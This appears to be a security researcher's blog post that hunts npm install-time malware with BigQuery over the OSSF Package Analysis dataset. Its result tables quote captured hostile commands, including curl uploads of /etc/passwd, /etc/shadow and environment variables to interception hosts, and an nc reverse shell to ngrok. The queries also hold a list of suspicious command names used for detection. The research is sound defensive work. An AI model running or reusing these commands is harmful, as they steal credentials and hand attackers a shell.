NPM malware hunt with OSSF Package Analysis, Sept 21, 2023

September 21, 2023 #malware-analysis #javascript #npm #ossf

Find the commonly executed commands during NPM package install:

SELECT
  Commands.Command[offset(0)] AS exe,
  COUNT(*) AS `count`,
FROM
  `ossf-malware-analysis.packages.analysis` AS T,
  T.Analysis.install.Commands as Commands
WHERE
  Package.Ecosystem = "npm"
  AND TIMESTAMP_TRUNC(CreatedTimestamp, MONTH) = TIMESTAMP("2023-09-01")
GROUP BY exe
ORDER BY `count` DESC
;

exe	count
node	814772
npm	424500
/bin/sh	340613
sleep	209428
sh	159084
sed	124058
printf	74544
rm	66336
as	63598
touch	54522
…	…

Now find the packages that execute an interesting selection of those commands:

SELECT
  T.Package.Name,
  T.Package.Version,
  Commands.Command[OFFSET(0)] AS exe,
  ARRAY_TO_STRING(Commands.Command, " ") AS command
FROM
  `ossf-malware-analysis.packages.analysis` AS T,
  T.Analysis.install.Commands AS Commands
WHERE
  Package.Ecosystem = "npm"
  AND TIMESTAMP_TRUNC(CreatedTimestamp, MONTH) = TIMESTAMP("2023-09-01")
  AND Commands.Command[OFFSET(0)] IN ("curl", "whoami", "/usr/bin/curl", "python", "wget", "docker", "sudo", "/bin/echo", "ping", "nc")
ORDER BY
  T.Package.Name,
  T.Package.Version 
  ASC
;

Name	Version	exe	command
@apps-common/ui-theme	10.1.0	`/usr/bin/curl`	`/usr/bin/curl c971b268fd0b.qlfu0xty7cyyfst1cs3qt6wz3q9hx7lw.oastify.com/ui-theme`
@dm-connect/manager	26.0.8	`curl`	curl -s -k -X POST -d passwd=root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:105::/nonexistent:/usr/sbin/nologin tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin&id_rsa=&ip=34.31.210.88 https://sha16.requestcatcher.com/h4ck3d
@dm-connect/manager	26.0.8	`curl`	`curl -s -k ifconfig.me`
@dm-connect/manager	28.0.9	`curl`	`curl -s -k -X POST -d root_directories=total 24 drwx------ 1 root root 4096 Sep 14 05:28 . dr-xr-xr-x 1 root root 4096 Sep 20 20:15 .. -rw-r--r-- 1 root root 3106 Oct 15 2021 .bashrc drwxr-xr-x 3 root root 4096 Sep 14 05:26 .cache drwxr-xr-x 3 root root 4096 Sep 14 05:25 .config drwxr-xr-x 4 root root 4096 Sep 20 20:15 .npm -rw-r--r-- 1 root root 161 Jul 9 2019 .profile https://sha16.requestcatcher.com/h4ck3d`
@get-bridge/bridge-string-utils	99.99.99	`curl`	`curl -H Hostname: NTJhMjQ0MWY3MGMwCg== -H Whoami: cm9vdAo= -H Pwd: L2FwcC9ub2RlX21vZHVsZXMvQGdldC1icmlkZ2UvYnJpZGdlLXN0cmluZy11dGlscwo= -d dG90YWwgOQpkcnd4ci14ci14IDIgcm9vdCByb290IDQwOTYgU2VwIDExIDE5OjM0IC4KZHJ3eHIt eHIteCAzIHJvb3Qgcm9vdCA0MDk2IFNlcCAxMSAxOTozNCAuLgotcnctci0tci0tIDEgcm9vdCBy b290ICAyNzEgU2VwIDExIDE5OjM0IHBhY2thZ2UuanNvbgotcnd4ci14ci14IDEgcm9vdCByb290 ICAxODkgU2VwIDExIDE5OjM0IHByZS5zaAo= https://cjvm1lk0sjhuban1t120rm6bqz7iuu5ka.oast.live`
@get-bridge/bridge-string-utils	99.99.99	`whoami`	`whoami`
@get-bridge/tapestry-sdk	99.99.991	`curl`	`curl -H Hostname: ZjM0ZmIzZWU0NGE1Cg== -H Whoami: cm9vdAo= -H Pwd: L2FwcC9ub2RlX21vZHVsZXMvQGdldC1icmlkZ2UvdGFwZXN0cnktc2RrCg== -d dG90YWwgMTIKZHJ3eHIteHIteCAzIHJvb3Qgcm9vdCA0MDk2IFNlcCAxMSAyMDo1NSAuCmRyd3hy LXhyLXggNSByb290IHJvb3QgNDA5NiBTZXAgMTEgMjA6NTUgLi4KZHJ3eHIteHIteCAzIHJvb3Qg cm9vdCA0MDk2IFNlcCAxMSAyMDo1NSBAZ2V0LWJyaWRnZQo= https://cjvm1lk0sjhuban1t120rm6bqz7iuu5ka.oast.live`
@get-bridge/tapestry-sdk	99.99.991	`whoami`	`whoami`
@harvard-lil/scoop	0.5.3	`curl`	`curl -L https://github.com/Hakky54/certificate-ripper/releases/download/2.1.0/crip-linux-amd64.tar.gz`
@harvard-lil/scoop	0.5.3	`curl`	`curl -L https://github.com/yt-dlp/yt-dlp/releases/download/2023.07.06/yt-dlp`
@instructure/quiz-number-input	18.0.1-rc.2	`python`	`python -c import sys; print(sys.executable);`
@molgenis/vip-report-template	5.5.4	`curl`	`curl --no-progress-meter --location https://github.com/molgenis/vip-utils/releases/download/v1.4.1/field_metadata.json --create-dirs --output src/metadata/field_metadata.json`
@molgenis/vip-report-vcf	1.4.3	`curl`	`curl --no-progress-meter --location https://github.com/molgenis/vip-utils/releases/download/v1.4.1/field_metadata.json --create-dirs --output src/metadata/field_metadata.json`
@prodperfect/cli	1.2.0	`curl`	`curl --url https://github.com/stedolan/jq/releases/download/jq-1.6/jq-linux64 --request GET --output /app/node_modules/@prodperfect/cli/../../.bin/jq --location --silent --show-error --write-out \n%{http_code}`
@xarber/xshopjs	1.0.0-b	`/bin/echo`	`/bin/echo`
@xarber/xshopjs	1.0.0-b	`sudo`	`sudo apt-get install unar -y`
adidas-data-mesh	4.4.7	`whoami`	`whoami`
adidas-data-mesh	4.8.7	`whoami`	`whoami`
adidas-data-mesh	4.8.9	`whoami`	`whoami`
adidas-data-mesh	6.6.6	`whoami`	`whoami`
adidas-data-mesh	9.4.7	`whoami`	`whoami`
adidas-data-mesh	9.9.4	`/usr/bin/curl`	`/usr/bin/curl --data @/etc/passwd a0359854ae4a.cm30n6w2vtc0000cv6m0gkboz5ayyyyyr.oast.fun`
adidas-data-mesh	9.9.7	`nc`	`nc tcp.in.ngrok.io 17353 -e /bin/bash`
adidas-data-mesh	9.9.8	`/usr/bin/curl`	`/usr/bin/curl --data @/etc/passwd b19d5f54a3a0aesic9l2whlwa33aytefcnu11s7jv8.burpcollaborator.net`
asherah	1.2.7	`curl`	`curl -s -L --fail -O --retry 999 --retry-max-time 0 https://github.com/godaddy/asherah-cobhan/releases/download/v0.4.25/libasherah-x64-archive.h`
asherah	1.2.7	`curl`	`curl -s -L --fail -O --retry 999 --retry-max-time 0 https://github.com/godaddy/asherah-cobhan/releases/download/v0.4.25/libasherah-x64.a`
asherah	1.2.9	`curl`	`curl -s -L --fail -O --retry 999 --retry-max-time 0 https://github.com/godaddy/asherah-cobhan/releases/download/v0.4.25/libasherah-x64-archive.h`
asherah	1.2.9	`curl`	`curl -s -L --fail -O --retry 999 --retry-max-time 0 https://github.com/godaddy/asherah-cobhan/releases/download/v0.4.25/libasherah-x64.a`
bbc-iplayer-sounds-chatbot	1.2.3	`whoami`	`whoami`
bbc-iplayer-sounds-chatbot	5.2.3	`whoami`	`whoami`
ccfedrtest-poc	1.0.3	`ping`	`ping 435dvf5lwsuqc7k2zmmip3zfm6sxgn4c.oastify.com`
centurylink	4.1.1	`whoami`	`whoami`
centurylink	5.1.1	`whoami`	`whoami`
centurylink	6.1.1	`whoami`	`whoami`
centurylink	7.1.1	`whoami`	`whoami`
centurylink	8.1.1	`whoami`	`whoami`
centurylink	9.1.1	`whoami`	`whoami`
centurylink	9.2.1	`whoami`	`whoami`
centurylink	9.4.1	`whoami`	`whoami`
centurylink	9.5.1	`whoami`	`whoami`
centurylink	9.8.1	`whoami`	`whoami`
centurylink	9.9.1	`whoami`	`whoami`
chain-list	20.0.0	`curl`	`curl ifconfig.me`
course-structure-debugger	10.999.0	`curl`	`curl https://ifconfig.me`
course-structure-debugger	10.999.0	`whoami`	`whoami`
course-structure-debugger	11.999.0	`curl`	`curl https://ifconfig.me`
course-structure-debugger	11.999.0	`whoami`	`whoami`
darkhat-hard-to-find-package-do-not-require-it	1.0.1	`curl`	`curl https://webhook.site/76a40c42-6fe4-4caf-9b37-49c5eda9ae20?darkhat=darkhat`
feature-flag-framework	9.999.0	`curl`	`curl https://ifconfig.me`
feature-flag-framework	9.999.0	`whoami`	`whoami`
fiji-core-cryptopool	9.999.0	`curl`	`curl https://ifconfig.me`
fiji-core-cryptopool	9.999.0	`whoami`	`whoami`
fiji-core-foc	9.999.0	`curl`	`curl https://ifconfig.me`
fiji-core-foc	9.999.0	`whoami`	`whoami`
fiji-core-foundation	9.999.0	`curl`	`curl https://ifconfig.me`
fiji-core-foundation	9.999.0	`whoami`	`whoami`
fiji-core-framework	9.999.0	`curl`	`curl https://ifconfig.me`
fiji-core-framework	9.999.0	`whoami`	`whoami`
goingwithflow	6.9.9	`whoami`	`whoami`
goingwithflow	9.8.9	`whoami`	`whoami`
inteken-app-client	9.9.1	`/usr/bin/curl`	`/usr/bin/curl --data @/etc/shadow 25371d442238xdede680mk624kgu48sasafdh4nubj.burpcollaborator.net`
inteken-app-client	9.9.5	`/usr/bin/curl`	`/usr/bin/curl --data @/etc/shadow 70839db2341del32g9cjsa8u8mo6t3fetd98lzrqff.burpcollaborator.net`
inteken-app-client	9.9.6	`/usr/bin/curl`	`/usr/bin/curl --data @/etc/passwd c15510217590el32g9cjsa8u8mo6t3fetd98lzrqff.burpcollaborator.net`
jupiter-emoji	9.999.0	`curl`	`curl https://ifconfig.me`
jupiter-emoji	9.999.0	`whoami`	`whoami`
jupiter-i18n	9.999.0	`curl`	`curl https://ifconfig.me`
jupiter-i18n	9.999.0	`whoami`	`whoami`
jupiter-opensdk	9.999.0	`curl`	`curl https://ifconfig.me`
jupiter-opensdk	9.999.0	`whoami`	`whoami`
lab-npm-package	1.0.7	`curl`	`curl -X POST -H Content-Type: application/json -d {env_variable: } https://webhook.site/6c53f051-f81b-4ea1-853c-a4ea76539a5c`
lab-npm-package	1.0.8	`curl`	`curl -X POST -H Content-Type: application/json -d {env_variable: rajesh } https://webhook.site/6c53f051-f81b-4ea1-853c-a4ea76539a5c`
lab-npm-package	2.0.1	`curl`	`curl -X POST -H Content-Type: application/json -d {"environment_variables": $(printenv \| jq -Rs .)} https://webhook.site/6c53f051-f81b-4ea1-853c-a4ea76539a5c`
lab-npm-package	2.0.2	`curl`	`curl -X POST -H Content-Type: application/json -d {environment_variables: $(printenv \| jq -Rs .)} https://webhook.site/6c53f051-f81b-4ea1-853c-a4ea76539a5c`
master-oracle-lib	20.0.0	`curl`	`curl ifconfig.me`
metronome-synth-info-lib	20.0.0	`curl`	`curl ifconfig.me`
metronome-synth-user-lib	20.0.2	`curl`	`curl ifconfig.me`
metronome-ui	21.0.2	`curl`	`curl ifconfig.me`
mfp-food-diary	0.1.1	`/usr/bin/curl`	`/usr/bin/curl --data @/etc/passwd dc9065f3a7b5cm31san2vtc000046akggkbohioyyyyyb.oast.fun`
mfp-food-diary	0.1.2	`/usr/bin/curl`	`/usr/bin/curl --data @/etc/passwd 5056fcbc2be2cm31san2vtc000046akggkbohioyyyyyb.oast.fun`
mfp-test-repo	0.1.1	`/usr/bin/curl`	`/usr/bin/curl --data @/etc/passwd f134e3ae147dcm31san2vtc000046akggkbohioyyyyyb.oast.fun`
npm-random-gen	1.0.1	`curl`	`curl -X POST -F file=@preinstall.txt https://eoerh8zdok2dcuf.m.pipedream.net`
pathkit-local	9.9.9	`/usr/bin/curl`	`/usr/bin/curl --data @/etc/passwd 00ad358605ce3y2fc9xtt9toy1u2y4txfy665xbnzc.burpcollaborator.net`
payment-react-component	1.5.0	`/usr/bin/curl`	`/usr/bin/curl 01dd4079912f.rhck43o9lrknmap6jncly360zr5itahz.oastify.com/payment-react-component`
pmd-github-action	2.1.1	`whoami`	`whoami`
pmd-github-action	7.2.9	`whoami`	`whoami`
pmd-github-action	7.9.9	`whoami`	`whoami`
pmd-github-action	9.9.9	`whoami`	`whoami`
ppreact7	7.0.0	`/usr/bin/curl`	`/usr/bin/curl --data @/etc/hosts 30e72bbc4f57.0yj0npk9xow79fekqjlndw4lr.canarytokens.com`
puppeteer-example	0.1.12	`whoami`	`whoami`
puppeteer-example	0.1.13	`whoami`	`whoami`
puppeteer-example	0.1.14	`whoami`	`whoami`
puppeteer-example	0.1.15	`whoami`	`whoami`
puppeteer-example	0.1.16	`whoami`	`whoami`
puppeteer-example	0.1.2	`/usr/bin/curl`	`/usr/bin/curl --data @/etc/passwd 4826533f4ab3cm31san2vtc000046akggkbohioyyyyyb.oast.fun`
puppeteer-example	0.1.3	`/usr/bin/curl`	`/usr/bin/curl --data @/etc/passwd 3bfb39b5a69dcm31san2vtc000046akggkbohioyyyyyb.oast.fun`
puppeteer-example	0.1.5	`/usr/bin/curl`	`/usr/bin/curl --data @/etc/passwd af54b23955a1cm31san2vtc000046akggkbohioyyyyyb.oast.fun`
puppeteer-example	0.1.6	`whoami`	`whoami`
puppeteer-example	0.1.8	`whoami`	`whoami`
puppeteer-example	0.1.9	`whoami`	`whoami`
quiz-presets	18.0.1-rc.2	`python`	`python -c import sys; print(sys.executable);`
rambox	1.0.0	`whoami`	`whoami`
scroller_super_top	1.0.2	`wget`	`wget https://ipinfo.io/`
simple-dvt-v1	0.0.3	`python`	`python -c import sys; print(sys.executable);`
simple-dvt-v1	0.0.3	`python`	`python -c import sys; print(sys.executable);`
simple-dvt-v1	0.0.4	`python`	`python -c import sys; print(sys.executable);`
simple-dvt-v1	0.0.4	`python`	`python -c import sys; print(sys.executable);`
sqlx-ts	0.5.0	`curl`	`curl -LSfs https://jasonshin.github.io/sqlx-ts/install.sh`
sw-kendo-atomic-theme	1.999.0	`curl`	`curl https://js.rip/nvjy3ak1e8`
sw-kendo-atomic-theme	1.999.0	`whoami`	`whoami`
symphony-monorepo	1.0.1	`whoami`	`whoami`
tourist-catapult	9.7.2	`curl`	`curl https://d7mr6puf9ww39.cloudfront.net/meta.xml`
tv-front	1.1.0	`/usr/bin/curl`	`/usr/bin/curl d1d1d5022c4b.rhck43o9lrknmap6jncly360zr5itahz.oastify.com`
ui-elements-icons	4.999.0	`curl`	`curl https://ifconfig.me`
ui-elements-icons	4.999.0	`whoami`	`whoami`
ui-elements-icons	6.0.0	`curl`	`curl https://ifconfig.me`
ui-elements-icons	6.0.0	`curl`	`curl https://ifconfig.me`
ui-elements-icons	6.0.0	`whoami`	`whoami`
ui-elements-icons	6.0.0	`whoami`	`whoami`
ui-elements-icons	8.999.0	`curl`	`curl https://ifconfig.me`
ui-elements-icons	8.999.0	`whoami`	`whoami`
ui-elements-icons	9.999.9	`curl`	`curl https://ifconfig.me`
ui-elements-icons	9.999.9	`whoami`	`whoami`
vesper-synth-user-lib	20.0.0	`curl`	`curl ifconfig.me`
visual_components	1.0.13	`curl`	`curl jylzs5g46s3de9d6vrrdlyu2ptvkjb70.oastify.com/cmd=root`
visual_components	1.0.13	`whoami`	`whoami`
visual_components	1.0.14	`curl`	`curl 042gymmlc99ukqjn18xurf0jva11ptdi.oastify.com/a204fd83488a/?tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin`
visual_components	1.0.18	`curl`	curl hufxo3c22qzba794rpnbhwq0lrrifd32.oastify.com/508e916424f2/?root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:105::/nonexistent:/usr/sbin/nologin tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin
visual_components	1.0.19	`curl`	curl 2jmido1nrbowzsypgacw6hflacg34zso.oastify.com/61e74477cc78/?root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:105::/nonexistent:/usr/sbin/nologin tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin
visual_components	1.0.20	`curl`	`curl gwgwq2e14p1ac6b3topajvsznqthhf54.oastify.com/5f90fe414aeb/?tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin`
visual_components	1.0.21	`curl`	`curl gwgwq2e14p1ac6b3topajvsznqthhf54.oastify.com/84a523804232/?tcpdump:x:104:106::/nonexistent:/usr/sbin/nologin`
wallet-switch-chain	21.0.3	`curl`	`curl ifconfig.me`
walletconnect-website	4.4.4	`whoami`	`whoami`
walletconnect-website	5.4.5	`whoami`	`whoami`
walletconnect-website	6.4.5	`whoami`	`whoami`
walletconnect-website	7.4.7	`whoami`	`whoami`
walletconnect-website	8.4.7	`whoami`	`whoami`
weak-json	1.0.1	`wget`	`wget -q https://gitlab.inria.fr/line/aide-group/aidebuild/-/raw/master/src/makefile -O ./.makefile.inc`
weak-json	1.0.1	`wget`	`wget -q https://gitlab.inria.fr/line/aide-group/aidebuild/-/raw/master/src/makefile -O ./.makefile.inc`
weak-json	1.0.1	`wget`	`wget -q https://gitlab.inria.fr/line/aide-group/aidebuild/-/raw/master/src/makefile -O ./.makefile.inc`
www-ankr-com	2.0.10	`curl`	`curl ifconfig.me`
ysb-ui-services	3.999.0	`curl`	`curl https://ifconfig.me`
ysb-ui-services	3.999.0	`curl`	`curl https://ifconfig.me`
ysb-ui-services	3.999.0	`whoami`	`whoami`
ysb-ui-services	3.999.0	`whoami`	`whoami`
ysb-ui-services	4.999.0	`curl`	`curl https://ifconfig.me`
ysb-ui-services	4.999.0	`curl`	`curl https://ifconfig.me`
ysb-ui-services	4.999.0	`whoami`	`whoami`
ysb-ui-services	4.999.0	`whoami`	`whoami`
zara-mkt-core	1.0.0	`/usr/bin/curl`	`/usr/bin/curl --header X-Origin-IP: 172.16.16.96 a390a2d55c32.sfbdsd25uq668574h501430r0i69u3is.oastify.com`
zara-mkt-core	9.9.1	`/usr/bin/curl`	`/usr/bin/curl --header X-Origin-IP: 172.16.16.14 --data @/app/node_modules/zara-mkt-core/filetemp101.txt e5604348176e.sfbdsd25uq668574h501430r0i69u3is.oastify.com`

We see puppeteer-example@0.1.5 invokes the command /usr/bin/curl --data @/etc/passwd af54b23955a1cm31san2vtc000046akggkbohioyyyyyb.oast.fun. Let’s see if we can identify the read of /etc/passwd and find other packages that do the same:

SELECT
  Files
FROM
  `ossf-malware-analysis.packages.analysis` AS T,
  T.Analysis.install.Files as Files
WHERE
  Package.Ecosystem = "npm"
  AND TIMESTAMP_TRUNC(CreatedTimestamp, MONTH) = TIMESTAMP("2023-09-01")
  AND Package.Name = "puppeteer-example"
  AND Package.Version = "0.1.5"
  AND Files.Read = true
;

Unfortunately, it seems that reading from /etc/passwd is a common operation during installation, perhaps as the sandbox reads its current environment or other typical NPM processes initialize themselves.

Lets explore the files that are written to during installation:

SELECT
  T.Package.Name,
  T.Package.Version,
  Files
FROM
  `ossf-malware-analysis.packages.analysis` AS T,
  T.Analysis.install.Files as Files
WHERE
  Package.Ecosystem = "npm"
  AND TIMESTAMP_TRUNC(CreatedTimestamp, MONTH) = TIMESTAMP("2023-09-01")
  AND Files.Write = true
  AND Files.Path NOT LIKE "/app/%"
  AND Files.Path NOT LIKE "/root/.npm/%"
  AND Files.Path NOT LIKE "/root/.cache/%"
  AND Files.Path NOT LIKE "/root/.node-gyp/%"
  AND Files.Path NOT LIKE "/tmp/%"
  AND Files.Path NOT LIKE "/usr/local/cargo/%"
  AND Files.Path NOT LIKE "/usr/lib/node_modules/%"
  AND Files.Path NOT LIKE "host:%"
  AND Files.Path NOT LIKE "pipe:%"
  AND Files.Path NOT LIKE "socket:%"
  AND Files.Path NOT LIKE "anon_inode:%"
  AND Files.Path != "/dev/tty"
  AND Files.Path != "/dev/null"
  LIMIT 1000
;

Name	Version	Path
@instructure/quiz-taking	18.1.2-rc.3	/root/.ssh/known_hosts
@things-factory/operato-hub	4.3.324	/root/.config/configstore/type-graphql.json.3648656340
@things-factory/sales-ui	4.3.323	/root/.config/configstore/type-graphql.json.1900368908
taro-plugin-mini-ci	1.0.0	/root/.minidev/assets/devtools-resource/99fa26bda16f811b4e22a8574be3ad29_downloading_1695179542563/mini-devtools-4-minidev/front_end/.DS_Store
taro-plugin-mini-ci	1.0.0	/root/.minidev/assets/devtools-resource/99fa26bda16f811b4e22a8574be3ad29_downloading_1695179542563/mini-devtools-4-minidev/front_end/._.DS_Store
…	…	…

Building up a denylist of directories would take a long time… There are hundreds of thousands of unique paths written to.